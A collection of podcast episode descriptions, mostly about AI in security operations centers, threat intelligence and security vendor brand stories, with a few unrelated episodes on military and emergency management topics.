As Black Hat USA 2025 approaches, the cybersecurity world is buzzing with innovation—and Dropzone AI is right at the center of it. With roots in Seattle and a mission to bring true intelligence into the security operations center (SOC), the Dropzone AI team is gearing up for a packed week in Las Vegas, from BSides to the AI Summit, and finally at Startup City (booth #6427).Founded by Edward Wu, former Head of AI/ML at ExtraHop Networks, Dropzone AI was built on a key realization: the last thing SOCs need is another flood of alerts. Instead, they need help processing and acting on them. That's where Dropzone comes in—offering an AI-powered security analyst that doesn't just detect threats, but investigates, correlates, and takes action.During a recent pre-event chat with ITSPmagazine's Sean Martin and Marco Ciappelli, Edward explained the core philosophy behind the platform. Unlike hype-driven claims of “fully autonomous SOCs,” Dropzone takes a practical, tiered approach to automation. Their agentic AI system performs full investigations, determines the nature of alerts (true vs. false positives), and recommends or executes containment actions depending on risk tolerance and policy.The tech has found particular traction with lean security teams, or those expanding toward 24/7 coverage without adding headcount. Rather than replacing humans, the platform augments them—freeing analysts from the drudgery of low-priority alert triage and giving them space to focus on strategic work. As Edward put it, “Nobody wants to be a tier-one analyst forever.” Dropzone helps make sure they don't have to be.The platform integrates across existing security stacks and data sources, drawing from threat intel, logs, and endpoint signals to build a full picture of every alert. Security teams retain full control, with human-in-the-loop decision-making remaining the standard in most use cases. However, for low-risk assets and off-hours scenarios, some customers are already authorizing autonomous action.With conversations at Black Hat expected to revolve around the reality of AI in production—not just the vision—Dropzone is entering the perfect arena. From demonstrating real-world impact to sharing insights on agentic design and trust boundaries, their presence will resonate with everyone from analysts to CISOs.Whether you're building out your SOC, questioning your MDR provider, or simply overwhelmed with alert fatigue, this may be your signal. Dropzone AI isn't selling buzzwords. They're delivering results. Visit them at Startup City, booth #6427, and see for yourself what the future of alert triage and SOC efficiency looks like—one investigation at a time. Note: This story contains promotional content. Learn more.Guests:Edward Wu, Founder/CEO at Dropzone AI On LinkedIn: https://www.linkedin.com/in/edwardxwu/DROPZONE AI: https://itspm.ag/dropzoneai-641Hosts:Sean Martin, Co-Founder at ITSPmagazine | Website: https://www.seanmartin.comMarco Ciappelli, Co-Founder at ITSPmagazine | Website: https://www.marcociappelli.com______________________ResourcesVisit the DROPZONE Website to learn more: https://itspm.ag/dropzoneai-641Learn more and catch more stories from Dropzone on ITSPmagazine: https://www.itspmagazine.com/directory/dropzoneaiLearn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programsNewsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-upAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
For episode 546 of the BlockHash Podcast, host Brandon Zemp is joined by Hugh Njemanze, Founder and President of Anomali. Hugh brings over 30 years of experience in enterprise software, having co-founded ArcSight and served as its CTO and EVP of R&D. He later led engineering for HP’s Enterprise Security Products group following ArcSight’s acquisition. Hugh has also served as an advisor at Kleiner Perkins and held senior roles at Verity and Apple, where he helped architect the Data Access Language (DAL). ⏳ Timestamps: 0:00 | Introduction1:03 | Who is Hugh Njemanze?4:28 | What is Anomali?9:12 | Anomali Products & ThreatStream18:23 | Evolution of AI in Security Operations20:28 | Anomali client use-cases24:15 | Future of Threat Intelligence31:30 | Anomali’s typical client32:35 | Anomali roadmap 202534:10 | Anomali website, socials & demos
Zak Krider, Trellix's Director of Strategy and AI, shares how Trellix has successfully integrated generative AI into their security operations and democratized access to AI models across the organization.Topics Include:Trellix formed from McAfee Enterprise and FireEye mergerProvides full security stack visibility in single platformServes SMBs to Fortune 500 and government customersUsed machine learning for two decades with 30 modelsRecently pivoted to generative AI with Wwise platformAI finds critical events among thousands daily alertsIncorporates threat hunting knowledge into AI prompt structuresAWS Bedrock central to AI strategy for model flexibilityFormed small tiger team to investigate generative AIAnthropic Claude provided breakthrough "aha moments" for capabilitiesAdopted "fail fast, learn fast" innovation culture approachEnabled employee access to models through Bedrock APIConducted innovation jam sessions with VC-style pitchesAI decoded Base64 without prompting, identified benign activityJunior analysts elevated to level two with AICommon misconception: models train on customer data falselyEarly challenge: providing too much data overwhelmed modelsSmaller models hallucinated more with plausible-sounding responsesDesign partner programs help prioritize product developmentDemocratize AI access beyond just technical teamsTest multiple models for specific use casesLarge models work better than small ones initiallyPrompt engineering crucial for effective model communicationModel Context Protocol will gain traction next yearBackend data security remains largely unsolved challengeFederal customers require on-premises, air-gapped AI solutionsParticipants:Zak Krider – Director of AI and Innovation, TrellixFurther Links:Website: https://www.trellix.comTrellix on AWS MarketplaceSee how Amazon Web Services gives you the freedom to migrate, innovate, and scale your software company at https://aws.amazon.com/isv/
In episode 142 of Cybersecurity Where You Are, Sean Atkinson is joined by Anthony Essmaker, former Product Marketing Manager at the Center for Internet Security®(CIS®); and Randy Rose, VP of Security Operations & Intelligence at CIS. Together, they discuss the nuanced, empathetic approach that's required to help U.S. State, Local, Tribal, and Territorial (SLTT) government organizations to address their cybersecurity needs. Here are some highlights from our episode:01.10. What the acronym "SLTT" means to CIS's operational mission05:39. Using a flexible approach to support the different cybersecurity needs of the 50 states09:43. How different resources and experiences contextualize "best practices" at the local level11:49. Trivia question: Which two U.S. states don't have counties?13:20. The complexity of cybersecurity challenges and resources for U.S. tribal entities20:11. A 20-year history of working with U.S. SLTTs to meet them where they are21:30. Relationships as the bedrock for a community model of SLTT cyber defense26:29. Geographical isolation and other factors affecting U.S. territories' cybersecurity needs32:42. A closing fun fact about the first U.S. fire districtResourcesEpisode 123: An Operational Playbook for Security ImpactThe CIS Security Operations Center (SOC): The Key to Growing Your SLTT's Cyber Maturity2024 MS-ISAC Tribal Sector Cybersecurity ReportMulti-State Information Sharing and Analysis Center®Nationwide Cybersecurity Review (NCSR)If you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.
Join us every Friday as we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands.Each week, we bring you a different expert guest who will share their invaluable insights on topics ranging from threat hunting and incident response to security operations and detection engineering. What makes these sessions special is their informal and interactive nature, allowing for an engaging dialogue between our guests, hosts, and the audience.You can sign up to join us for the live sessions at limacharlie.io/defender-fridays
In this episode, LTC Pete Guerdan (Special Operations Recruiting Battalion Commander) and MAJ Jim Maicke speak with Ambassador Andrew Young about the vital role our ARSOF Operators play in U.S. Embassies and how they enhance our strategic partnerships around the globe.
On this episode of the Cybersecurity Defenders Podcast we speak with Filip Stojkovski, Staff Security Engineer at Snyk.Filip is a cybersecurity professional with over 15 years of experience. He began his career as a SOC analyst and now leads SecOps engineering at Snyk. Filip also advises organizations on SOAR, AI for SOC, and threat intelligence strategies. He holds multiple SANS certifications, including GSTRT, GCTI, and GCFA, and was recognized as “Threat Seeker of the Year.” He is the creator of the LEAD Threat Intelligence Framework and the Security Automation Development Life Cycle. Filip regularly shares his expertise through industry talks and on his blog: Cyber Security Automation and Orchestration
Click here to send us your ideas and feedback on Blueprint!In this episode of Blueprint, host John Hubbard sits down with James Spiteri from Elastic to explore the transformative power of AI on the SOC. They delve into how advanced AI technologies, such as agentic AI models, MCP protocol, and automation, are reshaping the SOC landscape. Discover how AI enhances SOC efficiency, reduces mundane tasks, and integrates context-aware capabilities. Learn about the real-world applications, from automation in cybersecurity operations to the challenges and promises of large language models. This discussion covers the ethical considerations, potential risks, and the promising future of SOCs powered by AI. Tune in to get inspired and see how AI might revolutionize your cyber defense strategies.Check out John's SOC Training Courses for SOC Analysts and Leaders: SEC450: Blue Team Fundamentals - Security Operations and Analysis LDR551: Building and Leader Security Operations Centers Follow and Connect with John: LinkedIn
Send us a textSummary: In this episode of the PIO Podcast, Stephen Kuhr shares his extensive experience in emergency management, discussing his journey from the New York City Emergency Medical Service to his role at Colorado Springs Utilities. He emphasizes the importance of crisis communication, the differences between public and private sector emergency management, and the critical lessons learned throughout his career. Stephen highlights the need for transparency and effective communication during crises, and he shares practical insights on integrating crisis communications into emergency management plans.Steven's BIO: Steven Kuhr has spent his career in Emergency Management, building a diverse portfolio of leadership positions across multiple sectors. Mr. Kuhr served as Director of Emergency Management, Enterprise Continuity, and Security Operations at Colorado Springs Utilities.While serving in this position, Mr. Kuhr oversaw crisis, risk, and resiliency operations for energy and water utilities and dam operations for Colorado's second largest city. During this 0time, Mr. Kuhr also served as a Director with the InfraGard-Denver and co-founded the Colorado Critical Infrastructure Alliance.Earlier, Mr. Kuhr served with the New York City Office of Emergency Management as a founding Deputy Commissioner, leading emergency operations and multi-risk emergency planning. Prior to that he served with the New York City Fire Department as EMS Deputy Chief and Special Operations Commander. Mr. Kuhr is a trusted Crisis Management Leader. He has advised elected officials, CEOs and “C-Suite” Leaders during complex emergencies, major disasters, and terrorist attacks. Mr. Kuhr is also a respected consultant, serving as Managing Director and Emergency Management Practice Leader at Kroll Inc., and President and Chief Operating Officer at Strategic Emergency Group LLC. Mr. Kuhr has advised a variety of organizations in several business industries and government sectors to include federal, state, and local government agencies, transportation (rail, aviation, seaport, and surface), financial, energy (electricity/natural gas), water/wastewater, dams, major league baseball, cable news, commercial properties, defense, justice, law enforcement, and an agency serving people with disabilities and special needs.The Brandon T. Adams Audio ExperienceWelcome to The Brandon T. Adams Audio Experience, hosted by entrepreneur, investor,...Listen on: Apple Podcasts SpotifySupport the showOur premiere sponsor, Social News Desk, has an exclusive offer for PIO Podcast listeners. Head over to socialnewsdesk.com/pio to get three months free when a qualifying agency signs up.
In this episode of Data Security Decoded, join Caleb Tolin as he sits down with Grant Oviatt, Head of Security Operations at Prophet Security, to explore the transformative impact of AI agents in SOC environments. From reducing false positives by 95% to dramatically improving incident response times, discover how AI is augmenting human analysts rather than replacing them. Whether you're a CISO looking to optimize your security operations or a SOC analyst concerned about AI's impact on your role, this episode offers practical insights into successfully implementing AI-driven security solutions while building trust in automated systems. • Learn how AI agents handle tedious security tasks, freeing analysts for strategic work • Explore real-world success stories of AI-powered threat detection and response • Understand the critical balance between AI automation and human expertise • Get practical steps for deploying AI agents in your SOC
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Matt Muller, Field CISO at Tines. With over a decade of experience at companies like Material Security, Coinbase, and Inflection, Matt's got a strong track record of scaling SecOps teams, building threat detection and mitigation programs, and driving trust and safety initiatives. His knowledge impressed Thomas and the Tines team so much that they invited him to become the company's first Field CISO. In this episode: [02:41] The origins of Matt's insatiable appetite for all things security [04:05] Matt's path from business degree to Director of Trust at Inflection [07:07] Scaling Coinbase's security team from 3 to 50 [08:41] Addressing security's long-standing communication problem [10:55] Why “failure wasn't an option” when managing risk at Coinbase [14:14] What led Matt to a product role on Material Security's phishing protection team [17:31] Building what customers ask for vs. actually solving their problems [21:14] How Matt stays up to date with industry developments [22:35] Matt's favorite use cases for security automation [25:25] Matt's go-to automation best practices [27:33] Cutting through AI hype to drive meaningful adoption [30:32] How Matt keeps himself honest as a Field CISO [32:21] Why the traditional SOC is broken - and what needs to change [35:30] The role of diverse hiring in building a resilient security strategy [39:00] What security teams will look like in 2030 [41:35] How CISOs are evolving to become chief risk advisors to the business [43:30] Connect with Matt Where to find Matt: LinkedIn Building SecOps newsletter Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: Blue Team Con Material Security's Ryan Noon on the Future of Security Operations podcast
Guests: Eric Foster, CEO of Tenex.AI Venkata Koppaka, CTO of Tenex.AI Topics: Why is your AI-powered MDR special? Why start an MDR from scratch using AI? So why should users bet on an “AI-native” MDR instead of an MDR that has already got its act together and is now applying AI to an existing set of practices? What's the current breakdown in labor between your human SOC analysts vs your AI SOC agents? How do you expect this to evolve and how will that change your unit economics? What tasks are humans uniquely good at today's SOC? How do you expect that to change in the next 5 years? We hear concerns about SOC AI missing things –but we know humans miss things all the time too. So how do you manage buyer concerns about the AI agents missing things? Let's talk about how you're helping customers measure your efficacy overall. What metrics should organizations prioritize when evaluating MDR? Resources: Video EP223 AI Addressable, Not AI Solvable: Reflections from RSA 2025 (quote from Eric in the title!) EP10 SIEM Modernization? Is That a Thing? Tenex.AI blog “RSA 2025: AI's Promise vs. Security's Past — A Reality Check” blog The original ASO 10X SOC paper that started it all (2021) “Baby ASO: A Minimal Viable Transformation for Your SOC” blog “The Return of the Baby ASO: Why SOCs Still Suck?” blog "Learn Modern SOC and D&R Practices Using Autonomic Security Operations (ASO) Principles" blog
Podcast: OT Security Made SimpleEpisode: How to build a SIEM SOC in OT? | OT Security Made SimplePub date: 2025-05-22Get Podcast Transcript →powered by Listen411 - fast audio-to-text and summarizationZeek Muratovic, Director of Security Operations at Landis+Gyr talks about the first steps to build a SIEM SOC in OT environments. Being a pragmatist, he proposes a step-by-step approach that prevents OT operators from overkilling their budget AND workload.The podcast and artwork embedded on this page are from Klaus Mochalski, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.
In today's episode of the Cyber Culture Café series, Andy and John speak to Ciaran Luttrell, VP of Global Security Operations. As the VP, Global Security Operations, Ciaran began our European HQ and Security Operations Centre in Cork, Ireland in 2015, and led its initial setup and continued growth to form part of a best-of-breed 24/7/365 Global SOC function with 150 team members. He is responsible for all of eSentire's SOC teams with a focus on strategic direction and execution of continuous improvement initiatives across people, processes and technology. --Cybersecurity isn't just about platforms and processes—it's about people. If relationships matter in cybersecurity, this is where they begin. So, we're introducing a new, breakout series from the eSentire Cyber Talks Podcast – the Cyber Culture Café series! In this series, John Moretti and Andy Lalaguna will sit down for a candid conversation with one of the key players behind the eSentire customer experience. This series is all about pulling back the curtain and putting the spotlight on the people who power eSentire's world-class cybersecurity services.Join us for a relaxed and revealing discussion covering day-to-day challenges, personal motivation, industry observations, and the unique value each guest brings to the eSentire mission. Get to know the voices behind the protection—and why our people are at the core of everything we do.--Have a question for us? Reach out: hello@esentire.com---About Cyber TalksFrom ransomware attacks to supply chain compromises, eSentire's Cyber Talks podcast will delve into the world of the latest cyber threats that are impacting businesses globally. Join our team of security experts as we speak with C-level executives and security practitioners about the cyber risks affecting their business and how they're addressing these challenges.About eSentireeSentire, Inc., the Authority in Managed Detection and Response (MDR), protects the critical data and applications of 2000+ organizations in 80+ countries, across 35 industries from known and unknown cyber threats by providing Exposure Management, Managed Detection and Response and Incident Response services designed to build an organization's cyber resilience & prevent business disruption. Founded in 2001, eSentire protects the world's most targeted organizations with 65% of its global base recognized as critical infrastructure, vital to economic health and stability. By combining open XDR platform technology, 24/7 threat hunting, and proven security operations leadership, eSentire's award-winning MDR services and team of experts help organizations anticipate, withstand and recover from cyberattacks. For more information, visit www.esentire.com and follow @eSentire.
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Travis Howerton, Co-founder and CEO of RegScale. Travis began his security career with roles at government and regulated organizations, including the National Nuclear Security Administration and Oak Ridge National Laboratory, before being inspired by inefficiencies in compliance processes to co-found RegScale. As CEO of RegScale, he oversees their Continuous Controls Monitoring platform, which enables rapid GRC outcomes for organizations like Wiz, Keybank, and the US Department of Energy. In this episode: [02:15] How an interest in computer science led Travis to pursue a career in security [03:20] Working in “the Major Leagues of cyber” at the National Nuclear Security Administration [06:20] Moving fast in highly-regulated environments [07:10] Securing the world's fastest supercomputer at Oak Ridge National Laboratory [10:30] Supporting digital transformation at enormous scale at Bechtel Corp [15:15] How outdated compliance processes inspired Travis to co-found RegScale [18:15] How RegScale acquired its first high-profile clients through "hustle and luck" [19:20] The challenges of building the first version of RegScale [21:15] Taking the pain out of compliance [23:20] The biggest GRC roadblocks teams are facing right now [25:10] Practical advice for moving the needle on your automation program [27:33] Eliminating redundancy and inefficiency in federal compliance programs [32:30] What's next for RegScale [33:45] The best applications of AI (and which decisions should "never" be made AI) [35:45] Navigating regulatory uncertainty when it affects your whole business model [38:40] What SecOps and compliance teams might look like in the future [40:20] What the best compliance teams do to build rapport with security, IT and other business functions [43:30] Why AI adoption is a risk-based conversation every organization should be having with their CISO [46:00] Connect with Travis Where to find Travis Howerton: LinkedIn RegScale Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: The CISO Society 2025 State of Continuous Control Monitoring Report
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Raymond Schippers. With 15 years of experience leading detection and response teams, Raymond is a seasoned security leader with high-impact roles at Check Point and Canva under his belt. He recently became co-founder of Huntabil.IT, a Melbourne-based company providing organizations with tailored advisory services to align with their unique threat landscapes and business goals. In this episode: [02:27] Landing his first security internship at Siemens as a teenager [03:18] Reflecting on some state-sponsored attacks he encountered while working IR at Check Point [04:45] Working with government partners to attribute and dismantle APTs [08:10] The challenges of remediating threats for anonymized customers [09:30] What inspired Raymond's move from Check Point to Canva [10:35] Building Canva's blue team during the company's phase of hypergrowth [12:40] Rethinking the interview process to prioritize diversity in hiring [18:02] Proven strategies for reducing burnout and alert fatigue in IR [21:09] How Raymond's team used automation to scale security operations at Canva [23:16] The state of AI in security - and its most effective use cases [28:53] What inspired Raymond to found Huntabil.IT [31:09] Raymond's approach to working with non-profit organizations [39:15] The under-reported threats that could reshape the future of SecOps [44:06] Anticipating the biggest challenges security teams will face over the next five years [46:42] Connect with Raymond Where to find Raymond Schippers: LinkedIn Huntabil.IT Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: Cyber Threat Alliance Raymond's talk on avoiding team burnout at BSides Perth
Dr. Kashyap "Kash" Thimmaraju joins the show to talk about a new study on burnout, wellbeing, and flow state in security operations.George K and George A talk to Kash about: New research using psychologically validated scales to measure burnout in cybersecurity professionals How "flow state" might be the key to better performance AND preventing burnout The impact of remote work and isolation on security teams Practical techniques security leaders can implement TODAY to support their teamsProtecting our human resources is just as important as protecting our digital ones.Dr. Thimmaraju and his co-authors' research points to a significant gap in how we understand and support the mental wellbeing of security professionals. It's time to start changing that conversation.Mentioned this episode: Human Performance in Cybersecurity Operations Paper: https://flowguard-institute.com/wp-content/uploads/2025/03/Human-Performance-in-Security-Operations.pdf Human performance in cybersecurity survey: http://flowguard-institute.com/hpcs Flow Guard Institute: http://flowguard-institute.com
In episode 134 of Cybersecurity Where You Are, Sean Atkinson is joined by Randy Rose, VP of Security Operations & Intelligence at the Center for Internet Security® (CIS®); and Timothy Davis, Lead Cyber Threat Intelligence (CTI) Analyst at CIS. Together, they discuss how generative artificial intelligence (GenAI) lowers the barrier of entry for cyber threat actors (CTAs). Here are some highlights from our episode:01:37. CTAs' use of GenAI to improve their existing campaigns03:38. The need for CTI teams to look beyond language in analyzing GenAI-enabled threats07:22. The evolving impact of GenAI on phishing campaigns, malware development, deepfakes, and malicious Artificial Intelligence as a Service (AIaaS) offerings12:28. How GenAI increases the the speed at which CTAs can scale their efforts17:29. Technical barriers and other limitations that shape CTAs' use of GenAI22:46. A historical perspective of AI-enabled cybersecurity and how GenAI can support cybersecurity awareness training26:50. The cybersecurity benefits of AI and machine learning (ML) capabilities for clustering data29:05. What the future might hold for GenAI from an offensive and defensive perspectiveResourcesThe Evolving Role of Generative Artificial Intelligence in the Cyber Threat LandscapeEpisode 89: How Threat Actors Are Using GenAI as an EnablerEpisode 95: AI Augmentation and Its Impact on Cyber Defense12 CIS Experts' Cybersecurity Predictions for 2025CIS Critical Security Controls®Multi-State Information Sharing and Analysis Center®If you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Dane VandenBerg. Dane's 16-year security career includes product-focused roles with vendors like Qintel and more recently, Microsoft, where he was Principal Technical Specialist supporting the development of their security copilot. He's also spent a lot of time in fintech, serving as Vice President of Information Security at Prime Trust and, currently, Senior Director of Security Operations at Circle. In this episode: [02:05] How Dane went from researching women's health and animal cloning to public relations to security [06:25] Why security teams are still fighting the same battles they were 15 years ago [09:24] How Dane's vendor-side threat intel work shapes his thinking as a SecOps leader [12:00] What's working - and what's not - about how companies approach threat intelligence today [12:51] Why threat intel should be an in-house function, not just a reporting feed [15:30] What motivated Dane to move into the finance and crypto industry [19:30] How parenthood reshaped the way Dane thinks about risk [22:50] Tips for encouraging employees to report their security concerns [26:00] What a great security-vendor customer experience look like - and what too many vendors get wrong [29:10] The security tools and solutions Dane is most excited about right now [32:45] Balancing the hype and potential of security copilots [38:30] What cyberattacks might look like five years from now [41:30] Connect with Dane Where to find Dane: LinkedIn Circle Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: National Cyber Forensics and Training Alliance
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Josh Lemos, CISO at GitLab. Throughout his 15-year career in security, Josh has led teams at ServiceNow, Cylance, and Square. Known for his expertise in AI-driven security strategies, Josh is also a board member with HiddenLayer. He drives innovation at GitLab with a relentless focus on offensive security, identity management, and automation. In this episode: [02:05] His early career path from mechanic to electrical engineer to security leader [03:35] Josh's philosophy on hiring and mentoring, plus his tips for creating networking opportunities [05:30] How he applies technical foundations from his practitioner days to his work as CISO [07:40] Building product security at ServiceNow from the ground up [10:40] “Down and in” versus “up and out” - adopting a new leadership style as CISO at Square [12:17] Josh's experience as an early AI and security researcher at Cylance [16:15] What's surprised Josh most about the evolution of AI [18:50] Why Josh calls today's models “AI version 1.0” - and what he thinks it will take to upgrade to version 2.0 [22:45] The LLM security threats Josh is most worried about, as a board member with Hidden Layer [26:30] “Expressing exponential value” - what excited Josh most about becoming CISO at GitLab [27:45] Why GitLab prioritizes “intentional transparency” [32:45] How GitLab automates and orchestrates its Tier 1 and Tier 2 security processes [34:10] How GitLab's security team uses GitLab internally [37:35] The secret to recruiting, hiring, and managing a remote, global team [39:45] The importance of in-person collaboration for building trust and connection [41:45] Downsizing, bootstrapping, and problem-solving: Josh's predictions for the future of SecOps [46:10] Connect with Josh Where to find Josh: LinkedIn GitLab Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: GitLab's Security Handbook GitLab's GUARD Framework Netskope's security blog Jobs at GitLab Haroon Meer
Are you struggling to help SOC teams move beyond alert fatigue and scale investigations effectively? Curious how innovative startups are transforming security operations by empowering analysts, not just automating them? Wondering what truly sets apart the next wave of cybersecurity platforms—and what you can learn from their go-to-market approach? This episode delivers deep insight and practical lessons from the cutting edge of security operations.In this conversation we discuss:
In this week's episode of The Future of Security Operations podcast, Thomas is joined by Mark Hillick, CISO at Brex. Mark's experience in the security industry spans more than two decades. He started out as a security engineer at Allied Irish Banks before advancing through companies like MongoDB to become Director and Head of Security at Riot Games. His book, The Security Path, features over 70 interviews with security professionals on their career journeys. In this episode: [02:06] His early career journey - from a mathematics background to building early online banking systems [03:32] What's kept Mark excited about security for over two decades [04:40] The compound benefits of growing within a company over time [07:20] Mark's leadership style - defined by transparency, directness, and genuine care for his teammates [12:45] Communicating the business trade-off between risk and return [16:45] Reflecting on the team's response to major incidents at Riot Games [21:00] The unique challenges of securing gaming platforms [26:30] How Mark approaches strategy and planning in the fintech space [28:08] The case for building strong, partnership-driven vendor relationships [31:13] Creating space for creativity - without spreading the team too thin [34:35] Empowering his team to speak openly - even if it means calling him out [36:35] The inspiration behind Mark's books Digital Safety for Parents and The Security Path [40:20] Connect with Mark Where to find Mark: LinkedIn Brex Where to find Thomas Kinsella: LinkedIn Tines Resources mentioned: The Security Path - click here to redeem a free copy for podcast listeners (first come, first serve) Digital Safety for Parents - click here to redeem a free copy for podcast listeners (first come, first serve) Mark's talk during his time at Riot Games in 2016
We're on the road to RSAC 2025 — or maybe on a quantum-powered highway — and this time, Sean and I had the pleasure of chatting with someone who's not just riding the future wave, but actually building it.Marc Manzano, General Manager of the Cybersecurity Group at SandboxAQ, joined us for this Brand Story conversation ahead of the big conference in San Francisco. For those who haven't heard of SandboxAQ yet, here's a quick headline: they're a spin-out from Google, operating at the intersection of AI and quantum technologies. Yes — that intersection.But let's keep our feet on the ground for a second, because this story isn't just about tech that sounds cool. It's about solving the very real, very painful problems that security teams face every day.Marc laid out their mission clearly: Active Guard, their flagship platform, is built to simplify and modernize two massive pain points in enterprise security — cryptographic asset management and non-human identity management. Think: rotating certificates without manual effort. Managing secrets and keys across cloud-native infrastructure. Automating compliance reporting for quantum-readiness. No fluff — just value, right out of the box.And it's not just about plugging a new tool into your already overloaded stack. What impressed us is how SandboxAQ sees themselves as the unifying layer — enhancing interoperability across existing systems, extracting more intelligence from the tools you already use, and giving teams a unified view through a single pane of glass.And yes, we also touched on AI SecOps — because as AI becomes a standard part of infrastructure, so must security for it. Active Guard is already poised to give security teams visibility and control over this evolving layer.Want to see it in action? Booth 6578, North Expo Hall. Swag will be there. Demos will be live. Conversations will be real.We'll be there too — recording a deeper Brand Story episode On Location during the event.Until then, enjoy this preview — and get ready to meet the future of cybersecurity.⸻Keywords:sandboxaq, active guard, rsa conference 2025, quantum cybersecurity, ai secops, cryptographic asset management, non-human identity, cybersecurity automation, security compliance, rsa 2025, cybersecurity innovation, certificate lifecycle management, secrets management, security operations, quantum readiness, rsa sandbox, cybersecurity saas, devsecops, interoperability, digital transformation______________________Guest: Marc Manzano,, General Manager of the Cybersecurity Group at SandboxAQMarc Manzano on LinkedIn
At this year's RSAC Conference, the team from ThreatLocker isn't just bringing tech—they're bringing a challenge. Rob Allen, Chief Product Officer at ThreatLocker, joins Sean Martin and Marco Ciappelli for a lively pre-conference episode that previews what attendees can expect at booth #854 in the South Expo Hall.From rubber ducky hacks to reframing how we think about Zero Trust, the conversation highlights the ways ThreatLocker moves beyond the industry's typical focus on reactive detection. Allen shares how most cybersecurity approaches still default to allowing access unless a threat is known, and why that mindset continues to leave organizations vulnerable. Instead, ThreatLocker's philosophy is to “deny by default and permit by exception”—a strategy that, when managed effectively, provides maximum protection without slowing down business operations.ThreatLocker's presence at the conference will feature live demos, short presentations, and hands-on challenges—including their popular Ducky Challenge, where participants test whether their endpoint defenses can prevent a rogue USB (disguised as a keyboard) from stealing their data. If your system passes, you win the rubber ducky. If it doesn't? They (temporarily) get your data. It's a simple but powerful reminder that what you think is secure might not be.The booth won't just be about tech. The team is focused on conversations—reconnecting with customers, engaging new audiences, and exploring how the community is responding to a threat landscape that's growing more sophisticated by the day. Allen emphasizes the importance of in-person dialogue, not only to share what ThreatLocker is building but to learn how security leaders are adapting and where gaps still exist.And yes, there will be merch—high-quality socks, t-shirts, and even a few surprise giveaways dropped at hotel doors (if you resist the temptation to open the envelope before visiting the booth).For those looking to rethink endpoint protection or better understand how proactive controls can complement detection-based tools, this episode is your preview into a very different kind of cybersecurity conversation—one that starts with a challenge and ends with community.Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974Guest: Rob Allen, Chief Product Officer, ThreatLocker | https://www.linkedin.com/in/threatlockerrob/ResourcesLearn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlockerLearn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsa-conference-usa-2025-rsac-san-francisco-usa-cybersecurity-event-infosec-conference-coverage______________________Keywords: rsac conference, cybersecurity, endpoint, zero trust, rubber ducky, threat detection, data exfiltration, security strategy, deny by default, permit by exception, proactive security, security demos, usb attack, cyber resilience, network control, security mindset, rsac 2025, event coverage, on location, conference____________________________Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverageTo see and hear more Redefining CyberSecurity content on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-cybersecurity-podcastTo see and hear more Redefining Society stories on ITSPmagazine, visit:https://www.itspmagazine.com/redefining-society-podcastWant to tell your Brand Story Briefing as part of our event coverage? Learn More
LevelBlue's latest Threat Trends Report pulls no punches: phishing, malware, and ransomware attacks are not just continuing—they're accelerating. In this episode of ITSPmagazine's Brand Story podcast, hosts Sean Martin and Marco Ciappelli are joined by Kenneth Ng, a threat hunter and lead incident responder on LevelBlue's Managed Detection and Response (MDR) team, to unpack the findings and recommendations from the report.Phishing as a Service and the Surge in Email CompromisesOne of the most alarming trends highlighted by Kenneth is the widespread availability of Phishing-as-a-Service (PhaaS) kits, including names like RaccoonO365, Mamba 2FA, and Greatness. These kits allow attackers with little to no technical skill to launch sophisticated campaigns that bypass multi-factor authentication (MFA) by hijacking session tokens. With phishing attacks now leading to full enterprise compromises, often through seemingly innocuous Microsoft 365 access, the threat is more serious than ever.Malware Is Smarter, Simpler—and It's Spreading FastMalware, particularly fake browser updates and credential stealers like Lumma Stealer, is also seeing a rise in usage. Kenneth points out the troubling trend of malware campaigns that rely on basic user interactions—like copying and pasting text—leading to full compromise through PowerShell or command prompt access. Basic group policy configurations (like blocking script execution for non-admin users) are still underutilized defenses.Ransomware: Faster and More Automated Than EverThe speed of ransomware attacks has increased dramatically. Kenneth shares real-world examples where attackers go from initial access to full domain control in under an hour—sometimes in as little as ten minutes—thanks to automation, remote access tools, and credential harvesting. This rapid escalation leaves defenders with very little room to respond unless robust detection and prevention measures are in place ahead of time.Why This Report MattersRather than presenting raw data, LevelBlue focuses on actionable insights. Each major finding comes with recommendations that can be implemented regardless of company size or maturity level. The report is a resource not just for LevelBlue customers, but for any organization looking to strengthen its defenses.Be sure to check out the full conversation and grab the first edition of the Threat Trends Report ahead of LevelBlue's next release this August—and stay tuned for their updated Futures Report launching at RSA Conference on April 28.Learn more about LevelBlue: https://itspm.ag/levelblue266f6cNote: This story contains promotional content. Learn more.Guest: Kenneth Ng, threat hunter and lead incident responder on LevelBlue's Managed Detection and Response (MDR) team | On LinkedIn: https://www.linkedin.com/in/ngkencyber/ResourcesDownload the LevelBlue Threat Trends Report | Edition One: https://itspm.ag/levelbyqdpLearn more and catch more stories from LevelBlue: https://www.itspmagazine.com/directory/levelblueLearn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programsNewsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-upAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
